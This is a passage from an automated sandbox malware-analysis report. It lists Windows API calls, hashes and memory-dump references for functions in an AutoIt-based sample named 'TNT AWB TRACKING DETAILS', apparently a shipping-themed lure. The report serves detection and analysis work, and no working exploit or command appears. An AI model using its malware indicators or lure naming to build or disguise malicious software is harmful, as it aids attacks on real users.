                                      • API String ID: 2710830443-0
                                      • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                      • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                      • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                      • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                      Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                      • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                      • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                      • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                        • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                        • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                      • String ID:
                                      • API String ID: 146765662-0
                                      • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                      • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                      • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                      • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                      Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDesktopWindow.USER32 ref: 00472B63
                                      • GetDC.USER32(00000000), ref: 00472B6C
                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                      • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                      • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                      • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                      • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                      Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDesktopWindow.USER32 ref: 00472BB2
                                      • GetDC.USER32(00000000), ref: 00472BBB
                                      • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                      • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                      • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                      • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                      • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                      Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __getptd_noexit.LIBCMT ref: 00415150
                                        • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                        • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                        • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                        • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                        • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                      • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                      • __freeptd.LIBCMT ref: 0041516B
                                      • ExitThread.KERNEL32 ref: 00415173
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                      • String ID:
                                      • API String ID: 1454798553-0
                                      • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                      • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                      • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                      • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                      Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _strncmp
                                      • String ID: Q\E
                                      • API String ID: 909875538-2189900498
                                      • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                      • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                      • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                      • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                      Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                        • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                        • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                      • String ID: AutoIt3GUI$Container
                                      • API String ID: 2652923123-3941886329
                                      • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                      • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                      • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                      • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                      Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove_strncmp
                                      • String ID: U$\
                                      • API String ID: 2666721431-100911408
                                      • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                      • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                      • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                      • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                      Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                      • __wcsnicmp.LIBCMT ref: 00467288
                                      • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                      • String ID: LPT
                                      • API String ID: 3035604524-1350329615
                                      • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                      • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                      • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                      • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                      Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: \$h
                                      • API String ID: 4104443479-677774858
                                      • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                      • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                      • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                      • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                      Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID: &
                                      • API String ID: 2931989736-1010288
                                      • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                      • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                      • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                      • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                      Function 0044D3D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: \
                                      • API String ID: 4104443479-2967466578
                                      • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                      • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                      • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                      • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                      Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcslen.LIBCMT ref: 00466825
                                      • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CrackInternet_wcslen
                                      • String ID: |
                                      • API String ID: 596671847-2343686810
                                      • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                      • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                      • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                      • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                      Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: '
                                      • API String ID: 3850602802-1997036262
                                      • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                      • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                      • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                      • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                      Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                      Download Yara Rule
                                      APIs
                                      • _strlen.LIBCMT ref: 0040F858
                                        • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                        • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                      • _sprintf.LIBCMT ref: 0040F9AE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove$_sprintf_strlen
                                      • String ID: %02X
                                      • API String ID: 1921645428-436463671
                                      • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                      • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                      • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                      • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                      Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
